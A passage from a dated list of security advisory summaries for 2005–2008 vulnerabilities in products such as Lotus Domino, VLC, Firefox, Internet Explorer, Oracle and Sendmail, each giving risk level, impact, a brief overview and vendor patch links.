Critical vulnarability in Lotus Domino Web Access (iNotes)

2008-01-04

Risk level: high

Type: Buffer overflow

Source of info: CERT

Impact

Due to ActiveX Control Buffer Overflow in Lotus Domino Web Access (iNotes), it is possible for an 
attacker to compromise the controls to execute arbitrary code resulting in a buffer overflow 
situation.

Overview

As it is stated in an advisory provided by IBM (http://http://www-1.ibm.com/support/docview.wss?uid=swg21279071), 
in order for an attacker to successfully exploit this vulnerability in the following must be 
accomplished:

(1) The Lotus Domino Web Access feature needs to be enabled to allow users to access their mail via 
a browser.

(2) User has used the Domino Web Access client at least once, which installs the ActiveX control.

(3) Attacker must create malicious code that would exploit the ActiveX control and create the buffer 
overflow. This code can be part of an email, attachment, or web page.

(4) User must be persuaded to view a message, attachment or web site that contains the malicious code via a Microsoft® Internet Explorer (IE) web browser.

Patches

For workarounds and possible solutions please refer to: http://www-1.ibm.com/support/docview.wss?uid=swg21279071

Multiple vulnerabilities in VLC media player

2007-12-28

Risk level: high

Type: Remote code execution

Source of info: Secunia

Impact

Multiple vulnerabilities have been discovered in VLC Media Player, which can be exploited by malicious people to compromise a user's system.

Overview

The following two errors has been discovered in VLC by Michal Luczaj and Luigi Auriemma:
1) Boundary errors in the "ParseMicroDvd()", "ParseSSA()", and "ParseVplayer()" functions when handling subtitles can be exploited to cause stack-based buffer overflows.

2) A format string error in the web interface listening on port 8080/tcp (disabled by default) can be exploited via a specially crafted HTTP request with a "Connection" header value containing format specifiers.

Successful exploitation of the vulnerabilities allows execution of arbitrary code.

Patches

Check the VLC SVN repository.

Multiple Vulnerabilities in Thunderbird

2007-12-20

Risk level: high

Type: System access

Source of info: Secunia

Impact

Vulnerabilities discovered in Thunderbird, potentially can be exploited by malicious people to
compromise a user's system.

Overview

Two vulnerabilities have been reported in Thunderbird, which potentially can be exploited by malicious people to compromise a user's system.

1) An error related to URI handlers potentially allows to execute arbitrary code.

2) Various errors in the browser engine and the Javascript engine can potentially be exploited by malicious people to compromise a user's system.

For more information see:
http://www.mozilla.org/security/announce/2007/mfsa2007-29.html

Patches

For complete protection please upgrade to the latest version of Thunderbird 2 and do not enable JavaScript in mail.

Apple Mac OS X Security Update Fixes Multiple Vulnerabilities

2007-12-18

Risk level: critical

Type: System access

Source of info: Secunia

Impact

Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities.
If you are Mac OS X user then please update your system as soon as possible

Overview

For detailed information on all vulnerabilities patched in Mac OS X refer to http://docs.info.apple.com/article.html?artnum=307179
and
http://docs.info.apple.com/article.html?artnum=307224

Patches

http://www.apple.com/support/downloads/

Internet Explorer Multiple Code Execution Vulnerabilities

2007-12-11

Risk level: critical

Type: Remote code execution

Source of info: CERT

Impact

Microsoft has published cumulative patch for Internet Explorer. The patch resolves four 
privately reported vulnerabilities. 

Overview

According to Microsoft, critical security update resolves four privately reported vulnerabilities. 
The most serious security impact could allow remote code execution if a user viewed a specially crafted 
Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on 
the system could be less impacted than users who operate with administrative user rights.

For more details see:
http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx

Patches

Use Windows updates, or see:
http://www.microsoft.com/technet/security/Bulletin/MS07-069.mspx

Vulnerabilities in Symantec Mail Security for Exchange

2007-10-29

Risk level: high

Type: DoS

Source of info: Secunia

Impact

Multiple vulnerabilities in Symantec Mail Security for Exchange can be exploited to cause a DoS (Denial 
of Service) and compromise a vulnerable system.

Overview

See Secunia Advisory for more details:
http://secunia.com/advisories/27304/

Patches

Use vendor instructions to get patches.

Vulnerabilities in Novell - OpenSuSE

2007-10-12

Risk level: high

Type: many types

Source of info: SuSE Security Team

Impact

Seven vulerabilities have been patched in Novell - OpenSuSE linux. To avoid remote system compromise, please update your system.

Overview

Following Security Vulnerabilities have been solved:
- TK GIF image loader overflow
- openssl off-by-one overflow
- hugin temporary filename
- not affected by Xen virtual pygrub escape problem
- lighttpd buffer overflow
- novell-groupwise-gwclient SSL problems
- sylpheed-claws format string problem

For details and upgrades see SUSE Security Summary Report:
http://www.novell.com/linux/security/advisories/2007_20_sr.html

Patches

Use Novell's FTP server or/and the YaST Online Update.

Microsoft Updates for Multiple Vulnerabilities - Security Builettin for August 2007

2007-08-14

Risk level: high

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released updates that address several critical vulnerabilities in Microsoft 
Windows, Internet Explorer, Windows Media Player, 
Office, Office for Mac, XML Core Services, Visual Basic, Virtual PC, and Virtual Server. 

Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute 
arbitrary code or cause a denial of service on a vulnerable system.

Overview

For more information please refer to Microsoft Security Summary Bulletin: 
http://www.microsoft.com/technet/security/bulletin/ms07-aug.mspx

Patches

Please use Microsoft Update (https://update.microsoft.com/microsoftupdate/v6/default.aspx)  and Microsoft Office Updates (http://officeupdate.microsoft.com/) sites. 
Mac users please use Mactopia web site:
http://www.microsoft.com/mac/

Symantec ActiveX Control Input Validation Error

2007-08-09

Risk level: high

Type: Remote code execution

Source of info: Symantec

Impact

An input validation error has been discovered in two ActiveX controls used by Norton AntiVirus, Norton 
Internet Security, and Norton System Works. 

These vulnerabilities can be exploited by malicious people to compromise a user's system.

Overview

For more details please refer to:
http://www.symantec.com/avcenter/security/Content/2007.08.09.html

Patches

Please use LiveUpdate

Vulnerability in LinkedIn Internet Explorer Toolbar

2007-07-24

Risk level: highly critical

Type: System access

Source of info: Secunia

Impact

Jared DeMott and Justin Seitz from VDA Labs discovered vulnerability in LinkedIn Internet 
Explorer Toolbar that can be exploited to compromise a user's system.

 

Overview

For more details please refer to:
http://www.vdalabs.com/tools/linkedin.html
http://secunia.com/advisories/26181/

Patches

Please update toolbar to the latest version:
http://www.linkedin.com/static?key=browser_toolbar_download

Oracle published official patch for multiple vulnerabilities

2007-07-20

Risk level: critical

Type: many types

Source of info: ORACLE

Impact

Oracle published critical patch update that is a collection of patches for 45 security 
vulnerabilities and multiple non-security releated bugs. Due to the threat posed by a successful 
attack, it is higly recommended to apply this
 fixes as soon as possible.

Overview

For more datails please refer to Oracle's web-site:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html

Patches

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2007.html

Multiple Vulnerabilities in Mozilla Firefox

2007-07-19

Risk level: critical

Type: many types

Source of info: Secunia

Impact

Multiple vulnerabilities have been reported in Mozilla Firefox, which can be exploited to conduct 
spoofing and cross-site scripting attacks. These attacks can lead to a user's system compromise.

Overview

According to Secunia, the following errors have been discovered:
a) Errors in the browser engine can be exploited to cause memory corruption and potentially to 
arbitrary code execution.

b) Javascript engine has leaks that can be exploited to cause memory corruption and 
potentially to arbitrary code execution.

c) The "addEventListener" and "setTimeout" methods contain errors that can be exploited to inject 
script into another site's context, causing the browser's same-origin policy.

d) Errors in a cross-domain handling can be exploited to inject arbitrary HTML and script code 
in a sub-frame of another web site.

e) An unspecified error in the handling of elements outside of documents allows an attacker 
to call an event handler and execute arbitrary code with chrome privileges.

f) An unspecified error in the handling of "XPCNativeWrapper" can lead to execution of 
user-supplied code.

Patches

For updates see: 
http://www.mozilla.com/firefox/

Adobe Flash Player Multiple Vulnerabilities

2007-07-16

Risk level: high

Type: remote system compromise

Source of info: CERT

Impact

Vulnerabilities in Adobe Flash Player can be exploited to gather sensitive information or compromise a user's system.

Overview

For more information and list of vulnerable systems please refer to:
http://secunia.com/advisories/26027/
and 
http://www.adobe.com/support/security/bulletins/apsb07-12.html

Patches

Flash Player 9.0.45.0 and earlier (update to version 9.0.47.0):
http://www.adobe.com/go/getflash

Flash Player 9.0.45.0 and earlier - network distribution (update to version 9.0.47.0):
http://www.adobe.com/licensing/distribution

Flash CS3 Professional (update to version 9.0.47.0):
http://www.adobe.com/support/flashplayer/downloads.html

Flash Professional 8, Flash Basic (update to version 8.0.35.0):
http://www.adobe.com/support/flashplayer/downloads.html

Flex 2.0 (update to version 9.0.47.0):
http://www.stage.adobe.com/support/flashplayer/downloads.html#fp9

Microsoft published Security Bulletin Summary for July 2007

2007-07-10

Risk level: highly critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Microsoft has informed about  vulnerabilities: 3 critical, 2 important and 1 moderate, discovered and 
patched since publication of the previous bulletin in June.

Overview

Most of reported errors allow remote code execution	
and have been discovered in: Microsoft Excel, 
Microsoft Windows Active Directory, Microsoft .Net Framework, Microsoft Internet Information Services 
(IIS) and Windows Vista Firewall.

For more details please refer to:
http://www.microsoft.com/technet/security/bulletin/ms07-jul.mspx

Patches

http://www.microsoft.com/technet/security/bulletin/ms07-jul.mspx

SAP Message Server Buffer Overflow Vulnerability

2007-07-09

Risk level: high

Type: Buffer overflow

Source of info: NGSSoftware Insight Security

Impact

A vulnerability in SAP Message Server can be exploited to compromise a vulnerable system.
The vulnerability has been reported by Mark Litchfield from NGSSoftware Insight Security Research.

Overview

The vulnerability is caused due to a boundary error when processing HTTP requests and can be exploited to cause a heap-based buffer overflow via e.g a 
specially crafted GET request.

Successful exploitation allows execution of arbitrary code.

For additional information see: 
http://secunia.com/advisories/25966
http://www.us-cert.gov/cas/bulletins/SB07-197.html
http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-sap-message-server-heap-overflow/

Patches

Contact vendor and update to the latest version.

Yahoo! Messenger Two ActiveX Controls Buffer Overflows

2007-06-11

Risk level: highly critical

Type: Buffer overflow

Source of info: Secunia

Impact

Two vulnerabilities in Yahoo! Messenger has been reported. They can be exploited by malicious people 
to compromise a user's system.

Overview

Successful exploitation of the vulnerabilities allows   execution of arbitrary code.The vulnerabilities are 
confirmed in version 8.1.0.249. Other versions may also be affected.

For more details see Secunia Advisory:
http://secunia.com/advisories/25547/

Patches

http://messenger.yahoo.com

Microsoft Security Bulletin Summary for May 2007

2007-05-10

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

According to Microsoft Security Bulletin, there are seven critical updates available for Microsoft products. All of them could allow remote code execution. It is higly recomended to update vulnarable systems.

Overview

For more details see and updates see:
http://www.microsoft.com/technet/security/bulletin/ms07-may.mspx

Patches

See:
http://www.microsoft.com/technet/security/bulletin/ms07-may.mspx

Critical patches for Oracle Products

2007-04-19

Risk level: high

Type: Buffer overflow

Source of info: ORACLE

Impact

Oracle published a critical patch update, that consist a collection of patches for multiple security 
vulnerabilities.

Overview

According to Secunia Advisor, some of these vulnerabilities have unknown impacts, while others 
can be exploited to bypass certain security restrictions, cause a DoS (Denial of Service), 
conduct cross-site scripting and SQL injection attacks, or potentially compromise a vulnerable 
system.

More detailed information about these update can be found on Oracle website under the following link:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html

Patches

For patches see:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html

Microsoft Windows DNS Service Buffer Overflow Vulnerability

2007-04-16

Risk level: highly critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

Vulnerability in RPC on Windows DNS Server could allow an attacker to run code in the security context 
of the Domain Name System Server Service, which by default runs as Local SYSTEM. 

Overview

According to Microsoft website, Microsoft is investigating new public reports of attack exploiting 
a vulnerability in the Domain Name System (DNS)Server Service in Microsoft Windows 2000 Server Service Pack 
4, Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2. 
  Microsoft Windows 2000 Professional Service Pack 4, Windows XP Service Pack 2, and Windows Vista are not 
affected as these versions do not contain the vulnerable code.
 At this time, the attack does not appear widespread.

For more details see:
http://www.microsoft.com/technet/security/advisory/935964.mspx

Patches

not available

Vulnerability in Windows Animated Cursor Handling

2007-03-29

Risk level: high

Type: System access

Source of info: Microsoft Security Team

Impact

Vulnerabilities in the way Microsoft Windows handles animated cursor (.ani) files can be exploited by 
malicious people to compromise a user's system. 

Overview

According to Microsoft Advisory (935423), in order for this attack to be carried out, a user must either
 visit a Web site that contains a Web page that is used to exploit the vulnerability or view a specially 
crafted e-mail message or email attachment sent to them by an attacker. Exploitation of this 
vulnerability can allow arbitrary code execution.

Patches

Check Windows Updates - the patch should be available  soon.

Vulnerabilities in StarOffice

2007-03-28

Risk level: high

Type: System access

Source of info: Secunia

Impact

Vulnerabilities in StarOffice can be used by malicious people to compromise a user's system.

Overview

Two vulnerabilities has been found in StarOffice 6.x /StarSuite 7.x/ StarSuite 8.x. According to Sun 
Microsystems, first of them is a result of the way how StarOffice process StarCalc 1.0 documents (.sdc) 
and may allow a remote unprivileged user (who provides a StarCalc document that is opened by a 
local user) the ability to execute arbitrary commands on the system with the privileges of the user running 
StarOffice/StarSuite. The second is caused by  the way in which StarOffice/StarSuite 6, 7 and 8 process 
hyperlinks (URLs) in documents and also may allow a remote unprivileged user who provides 
a StarOffice/StarSuite document that is opened by a local user the ability to execute arbitrary commands 
on the system with the privileges of the user running StarOffice/StarSuite.

Patches

none

Apple Updates for Multiple Vulnerabilities

2007-03-14

Risk level: high

Type: Remote code execution

Source of info: CERT

Impact

Apple Mac OS X is affected by multiple vulnerabilities. 

Overview

Apple has released Security 
Update 2007-003 to address vulnerabilities, on of them may allow a remote  attacker to place and run
malicious programs on  your computer.

Install Apple Security Update 2007-003 through Apple 
Update (See: http://docs.info.apple.com/article.html?artnum=106704)
 

Patches

Install Apple Security Update 2007-003 through Apple 
Update (See: http://docs.info.apple.com/article.html?artnum=106704)
 

Mozilla Firefox Multiple Vulnerabilities

2007-03-06

Risk level: high

Type: many types

Source of info: Secunia

Impact

Vulnerabilities in Mozilla Firefox can be exploited 
by malicious people to bypass certain security 
restrictions, conduct cross-site scripting and 
spoofing attacks, gain knowledge of sensitive 
information, and potentially compromise a user's 
system.

Overview

According to Secunia (http://secunia.com/advisories/24205/) 
the following vulnerabilities has been detected:
1) An error in the handling of the 
"locations.hostname" DOM property can be exploited 
to bypass certain security restrictions.

2) An integer underflow error in the Network 
Security Services (NSS) code when processing SSLv2 
server messages can be exploited to cause a 
heap-based buffer overflow via a certificate with 
a public key too small to encrypt the "Master 
Secret".

Successful exploitation may allow execution of arbitrary code.

NOTE: Support for SSLv2 is disabled in Firefox 
2.x. This version is only vulnerable if user has 
modified hidden internal NSS settings to re-enable 
SSLv2 support.

3) It is possible to conduct cross-site scripting 
attacks against sites containing a frame with a 
"data:" URI as source.

Successful exploitation requires that a user is 
tricked into visiting a malicious website and 
opening a blocked popup.

4) It is possible to open windows containing local 
files thereby stealing the contents when the full 
path of a locally saved file containing malicious 
script code is known. This can be exploited in 
combination with a flaw in the seeding of the 
pseudo-random number generator causing downloaded 
files to be saved to temporary files with a 
somewhat predictable name.

Successful exploitation requires that a user is 
tricked into visiting a malicious website and 
opening a blocked popup.

5) Browser UI elements like the host name and 
security indicators can be spoofed using a 
specially crafted custom cursor and manipulating 
the CSS3 hotspot property.

6) It may be possible to gain knowledge of 
sensitive information from a website due to an 
error resulting in two web pages colliding in the 
disk cache thereby potentially appending part of 
one document to the other.

Successful exploitation requires that a user is 
tricked into visiting a malicious website while 
visiting the target website.

7) Various errors in the Mozilla parser when 
handling invalid trailing characters in HTML tag 
attribute names and during processing of UTF-7 
content when child frames inherit the character 
set of its parent window can be exploited to 
conduct cross-site scripting attacks.

8) A vulnerability in the Password Manager may be 
exploited to conduct phishing attacks.

For more information:
SA23046

9) Multiple memory corruption errors exist in the 
layout engine, JavaScript engine, and in SVG. Some 
of these may be exploited to execute arbitrary 
code on a user's system.

10) An error within the handling of the onUnload 
event handler and self-modifying document.write()
calls can be exploited to corrupt memory and
potentially execute arbitrary code.

11) The fix for MFSA 2006-72 introduced a 
regression, which can be exploited to execute 
arbitrary code by setting the "src" attribute of 
an "IMG" tag to a specially crafted 
javascript:URI.

Patches

Update to the newest version of Firefox:
http://www.mozilla.com/en-US/

Vulnerability in Microsoft Office Could Allow Remote Code Execution

2007-02-05

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Microsoft is investigating new public reports of Microsoft Excel 'zero-day' attacks using a vulnerability in Microsoft Office 2000, Microsoft Office XP, Microsoft Office 2003, and Microsoft Office 2004 for Mac

In order for this attack to be carried out, a user must first open a malicious Office file attached to an e-mail or otherwise provided to them by an attacker.

Overview

According to Microsoft he vulnerability cannot be exploited on Office 2007 or on Works 2004, 2005, or 2006.
	
An attacker who successfully exploited this vulnerability could gain the same user rights as 
the local user, so users whose accounts are 
configured to have fewer user rights on the system 
could be less affected than users who operate with 
administrative user rights.

In a Web-based attack scenario, an attacker would 
have to host a Web site that contains a Office 
file that is used to attempt to exploit this 
vulnerability. In addition, compromised Web sites 
and Web sites that accept or host user-provided 
content could contain specially crafted content 
that could exploit this vulnerability. An attacker 
would have no way to force users to visit a 
malicious Web site. Instead, an attacker would 
have to persuade them to visit the Web site, 
typically by getting them to click a link that 
takes them to the attacker's site.

The vulnerability cannot be exploited 
automatically through e-mail. For an attack to be 
successful a user must open an attachment that is 
sent in an e-mail message.
	
Users who have installed and are using the Office 
Document Open Confirmation Tool for Office 2000 will be prompted with Open, Save, or Cancel before 
opening a document.

For more details please see:
http://www.microsoft.com/technet/security/advisory/932553.mspx

Patches

Patches are currently not available, so do not open or save Office files that you receive from un-trusted sources or that you receive unexpectedly from trusted sources.

ORACLE Releases Patches for several vulnerabilities

2007-01-17

Risk level: critical

Type: many types

Source of info: ORACLE

Impact

Oracle has released critical patches for 
vulnerabilities in several Oracle products. The 
impacts of these vulnerabilities include remote 
execution of arbitrary code, information disclosure, 
and denial of service.

Overview

According to Oracle, Critical Patch Update for January 2007 (CPU) contains:
    * 17 new security fixes for the Oracle
 Database, one of which is for Oracle Database 
 client-only installations
    * 9 new security fixes for the Oracle HTTP 
 Server
    * 12 new security fixes for the Oracle
 Application Server
    * 7 new security fixes for the Oracle
 E-Business Suite
    * 6 new security fixes for the Oracle  
 Enterprise Manager
    * 3 new security fixes for the Oracle
 PeopleSoft Enterprise PeopleTools

Many Oracle products include or share code with 
other vulnerable Oracle products and components. 
Therefore, one vulnerability may affect multiple 
Oracle products and components. For example, the 
January 2007 CPU does not contain any fixes 
specifically for Oracle Collaboration Suite. 
However, Oracle Collaboration Suite is affected by 
vulnerabilities in Oracle Database and Oracle 
Application Server, so sites running Oracle 
Collaboration suite should install fixes for 
Oracle Database and Oracle Application Server. 
Refer to the January 2007 CPU for details 
regarding which vulnerabilities affect specific 
Oracle products and components. 

Patches

Apply the appropriate patches or upgrade as specified 
in the Critical Patch Update - January 2007:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html

Critical update for Adobe Reader

2007-01-10

Risk level: critical

Type: remote system compromise

Source of info: Adobe Inc.

Impact

According to Adobe Bulletin APSB07-01 there are several vulnerabilities, including issues that have already been disclosed. It is recommended that users update to the most current version of Adobe Reader or Acrobat available.

Overview

According to Adobe Inc. an update is available for a cross-site scripting (XSS) vulnerability in versions 7.0.8 and earlier of Adobe Reader and Acrobat that could allow remote attackers to inject arbitrary JavaScript into a browser session. This vulnerability, previously reported in APSA07-01 on January 4, 2007, has been assigned an important severity rating. Additional vulnerabilities have been identified in versions 7.0.8 and earlier of Adobe Reader and Acrobat that could allow an attacker who successfully exploits these vulnerabilities to take control of the affected system. These vulnerabilities have been assigned a critical severity rating. A malicious file must be loaded in Adobe Reader by the end user for an attacker to exploit these vulnerabilities. It is recommended that users update to the most current version of Adobe Reader or Acrobat available.

For more details see:
http://secunia.com/advisories/23666/

Patches

http://www.adobe.com/support/security/bulletins/apsb07-01.html

Exploit Code Available for Multiple Vulnerabilities in Sun Java Runtime Environment

2007-01-10

Risk level: high

Type: Elevation of privilege

Source of info: CERT

Impact

Security vulnerabilities in the Java Runtime Environment may allow untrusted applets to elevate privileges and Execute Arbitrary Code

Overview

According to the US-CERT there is publicly available exploit code for multiple vulnerabilities in Sun Java Runtime Environment (JRE). 

We encourages users to take the following actions to 
help mitigate the effects of these vulnerabilities:
  - upgrade to patched versions for impacted Sun
  products as specified in Sunsolve Documents: 102729 
  and 102731.
  - disable Java as specified in the securing your 
  web browser document until updates can be applied.

Patches

http://sunsolve.sun.com/search/document.do?assetkey=1-26-102729-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102731-1

Microsoft Security Bulletin Summary for January, 2007

2007-01-09

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft released advisory that consist of updates for newly discovered vulnerabilities. There are four critical vulnerabilities and one important.

Overview

The critical vulnerabilities described in the advisory are:
 -vulnerabilities in Microsoft Excel that could     
 allow remote code execution (927198) see  
 MS07-003,
 -vulnerabilities in Microsoft Outlook that could  
 allow remote code execution (925938) see 
 MS07-004.
 -vulnerability in Vector Markup Language could 
 allow remote code execution (929969). This update resolves vulnerabilities in Internet Explorer that could allow remote code execution.
The important update is:
 -vulnerability in Microsoft Office 2003 - Brazilian  
 Portuguese Grammar Checker Could allow remote code  
 execution (921585)
For details see:
http://www.microsoft.com/technet/security/bulletin/ms07-jan.mspx

Patches

See:
http://www.microsoft.com/technet/security/bulletin/ms07-jan.mspx

Cross-Site scripting vulnerabilities in SquirrelMail

2006-12-04

Risk level: moderate

Type: Cross-Site Scripting (XSS)

Source of info: Secunia

Impact

Some vulnerabilities have been reported in 
SquirrelMail, which can be exploited by malicious 
people to conduct cross-site scripting and script 
insertion attacks.

Overview

According to Secunia Advisory, SquirrelMail in versions prior to 1.4.9a consist following vulnerabilities:
1) Input passed to certain parameters in webmail.php 
and compose.php in the "draft", "compose", and 
"mailto" functionality is not properly sanitised 
before being returned to the user. This can be 
exploited to execute arbitrary HTML and script code 
in a user's browser session in context of an affected site.

2) Input validation errors exist in the magicHTML 
filter when sanitising HTML mails. This can be 
exploited to insert arbitrary HTML and script 
code, which is executed in a user's browser 
session in context of an affected site when the 
malicious data is viewed.

Successful exploitation of some of these errors 
require that the target user runs Microsoft 
Internet Explorer.

Patches

http://squirrelmail.org/security/issue/2006-12-02

Microsoft Security Bulletin Summary for August

2006-08-08

Risk level: critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

Multiple vulnerabilities has been discovered in Microsoft products. There is 9 critical and 3 important updates.

Overview

The following issues has been discovered:
- Vulnerability in Server Service Could Allow Remote Code Execution (921883)
-Vulnerability in DNS Resolution Could Allow Remote Code Execution (920683)
-Remote code execution issue in Internet Explorer (918899)
-Vulnerability in Microsoft Windows Could Allow Remote Code Execution (920214)
-Vulnerability in Microsoft Management Console Could Allow Remote Code Execution (917008)
-Vulnerability in HTML Help Could Allow Remote Code Execution (922616)
-Vulnerability in Microsoft Visual Basic for Applications Could Allow Remote Code Execution (921645)
-Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (922968)
-Vulnerability in Windows Kernel Could Result in Remote Code Execution (917422)
-Vulnerability in Windows Explorer Could Allow Remote Code Execution (921398)
-Vulnerability in Windows Kernel Could Result in Elevation of Privilege (920958)
-Vulnerabilities in Microsoft Windows Hyperlink Object Library Could Allow Remote Code Execution (920670)

For detiled overview see:
http://www.microsoft.com/technet/security/bulletin/ms06-aug.mspx

Patches

http://www.microsoft.com/technet/security/bulletin/ms06-aug.mspx

Critical Vulnerabilities in Oracle

2006-07-19

Risk level: high

Type: many types

Source of info: CERT

Impact

The impact of these vulnerabilities varies depending on the product, component, and configuration of the system. Potential consequences include the execution of arbitrary code or commands, information disclosure, and denial of service. Vulnerable components may be available to unauthenticated, remote attackers. An attacker who compromises an Oracle database may be able to gain access to sensitive information.

Overview

For list of affected product and detailed overview please visit:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html

Patches

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html

Vulnerabilities in Microsoft Windows, Internet Explorer, Media Player, Word, PowerPoint, and Exchange

2006-06-13

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Multiple critical vulnerabilities has been updated in Microsoft Products. Eight of them are critical.

Overview

For detailed overview and patches see:
http://www.microsoft.com/technet/security/bulletin/ms06-jun.mspx

Patches

Please use windows updates.
For details about patches see:
http://www.microsoft.com/technet/security/bulletin/ms06-jun.mspx

Microsoft Windows and Exchange Server Vulnerabilities

2006-05-09

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Three vulnerabilities has been discoverd in Microsoft   products. Two of them are critical and alows remote code execution. One is moderate.

Overview

The products that are affected:
-vulnerability in Microsoft Exchange Could Allow  Remote Code Execution (916803)
-vulnerabilities in Macromedia Flash Player from Adobe Could Allow Remote Code Execution (913433)
-vulnerability in Microsoft Distributed Transaction Coordinator Could Allow Denial of Service (913580)

For details see:
http://www.microsoft.com/technet/security/bulletin/ms06-may.mspx

Patches

Please use automatic updates.
For details see on patches:
http://www.microsoft.com/technet/security/bulletin/ms06-may.mspx

Mozilla Products Contain Multiple Vulnerabilities

2006-04-17

Risk level: medium

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

The Mozilla web browser and products based on Mozilla components contains several vulnerabilities. One of them could allow a remote attacker to execute arbitrary code on a system running affected component.

Overview

The list of affected products and detailed report on the vulnerabilities could be find in:
 http://www.us-cert.gov/cas/techalerts/TA06-107A.html  

Patches

Please check
http://www.mozilla.org
for upgrades

Microsoft Windows and Internet Explorer Vulnerabilities

2006-04-11

Risk level: high

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released updates that address critical vulnerabilities in Microsoft Windows and Internet Explorer. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on a vulnerable system.

Overview

For detailed overview see:
http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx

Patches

See:
http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx

Sendmail Race Condition Vulnerability

2006-03-23

Risk level: high

Type: Remote code execution

Source of info: CERT

Impact

A remote, unauthenticated attacker could execute arbitrary code with the privileges of the Sendmail process. If Sendmail is running as root, the attacker could take complete control of an affected system.

Overview

Sendmail contains a race condition caused by the improper handling of asynchronous signals. In particular, by forcing SMTP server to have an I/O timeout at exactly the correct instant, the attacker may be able to execute arbitrary code with the privileges of the Sendmail process.

More information is available in the Sendmail version 8.13.6 release page and the Sendmail MTA Security Vulnerability Advisory.

Patches

For details see:
http://www.sendmail.com/company/advisory/

Cumulative Security Update for Internet Explorer

2005-12-13

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

Four critical vulnerabilities have been found in Microsoft Internet Explorer, which can be used to compromise a user's system.

Overview

Details of vulnerabilities:
1) A remote code execution vulnerability exists in the way Internet Explorer displays file download
 dialog boxes and accepts user input during interaction with a Web page. An attacker could 
exploit the vulnerability by constructing a malicious Web page that could potentially allow 
remote code execution if a user visited the malicious Web site. An attacker who successfully 
exploited this vulnerability could take complete control of an affected system. However, 
significant user interaction is required to exploit this vulnerability.

2)An information disclosure vulnerability exists in the way Internet Explorer behaves in certain 
situations where an HTTPS proxy server requires clients to use Basic authentication. This 
vulnerability could allow an attacker to read Web addresses in clear text sent from Internet 
Explorer to a proxy server despite the connection being an HTTPS connection.

3)A remote code execution vulnerability exists in the way Internet Explorer instantiates COM objects 
that are not intended to be instantiated in Internet Explorer. An attacker could exploit the 
vulnerability by constructing a malicious Web page that could potentially allow remote code execution 
if a user visited the malicious Web site. An attacker who successfully exploited this 
vulnerability could take complete control of an affected system.

4)A remote code execution vulnerability exists in the way Internet Explorer handles mismatched 
Document Object Model objects. An attacker could exploit the vulnerability by constructing a 
malicious Web page.

For more details visit:
http://www.microsoft.com/technet/security/bulletin/ms05-dec.mspx

Patches

For details see:
http://www.microsoft.com/technet/security/bulletin/ms05-dec.mspx

Multiple Vulnerabilities in Oracle Products

2005-11-19

Risk level: critical

Type: Remote code execution

Source of info: CERT

Impact

Oracle released a Critical Patch Update in October 2005. It addresses more than eighty vulnerabilities 
in different Oracle products and components. The impact of these vulnerabilities varies depending
on the product, component, and configuration of the system. Potential consequences include remote
execution of arbitrary code or commands, information disclosure, and denial of service. 
An attacker who compromises an Oracle database may be able to gain access to sensitive information.

Overview

The Critical Patch Update provides information about affected components, access and authorization 
required, and the impact of the  vulnerabilities on data confidentiality, integrity, and availability. 
For more information on terms used in the Critical Patch Update, Metalink customers should refer to
MetaLink Note 293956.1.

According to the Critical Patch Update: "The new database vulnerabilities addressed by this 
Critical Patch Update do not affect Oracle database Client-only installations (installations 
that do not have the Oracle Database Server 
installed). Therefore, it is not necessary to apply 
this Critical Patch Update to client-only 
installations if a prior Critical Patch Update, or 
Alert 68, has already been applied to the 
client-only installations."

US-CERT recommends that sites running Oracle review the Critical Patch Update, apply patches, 
and take other mitigating action as appropriate. US-CERT is tracking all of these issues under 
VU#210524. As further information becomes 
available, we will publish individual Vulnerability Notes.

Note that according to public reports, the patches included in this update, as well as previous 
updates, may not adequately correct all security.

For details see:
http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html

Patches

http://www.oracle.com/technology/deploy/security/pdf/cpuoct2005.html

Thunderbird Command Line URL Shell Command Injection

2005-10-03

Risk level: critical

Type: remote system compromise

Source of info: Peter Zelezny

Impact

A remote, unauthenticated attacker may be able to 
execute arbitrary commands with the privileges of 
the user of the application which invoked the 
vulnerable shell script.

Overview

The vulnerability is caused due to the shell script
used to launch Thunderbird is parsing shell commands 
that are enclosed within backticks in the URL 
provided via the command line. This can e.g. be 
exploited to execute arbitrary shell commands by 
tricking a user into following a malicious link with 
the "mailto:" URI handler in an external application 
which uses Thunderbird as the default mail reader 
(e.g. Firefox on Fedora Core 4).

For additional information see:
https://bugzilla.mozilla.org/show_bug.cgi?id=307185
http://secunia.com/advisories/16869/
http://secunia.com/advisories/16846/
http://secunia.com/advisories/16901/

Patches

http://www.mozilla.org/products/thunderbird/

Microsoft Security Bulletin Summary for August 2005

2005-08-10

Risk level: critical

Type: many types

Source of info: Microsoft Security Team

Impact

Microsoft has released the Security Bulletin Summary  for August 2005. In the summary six vulnerabilities 
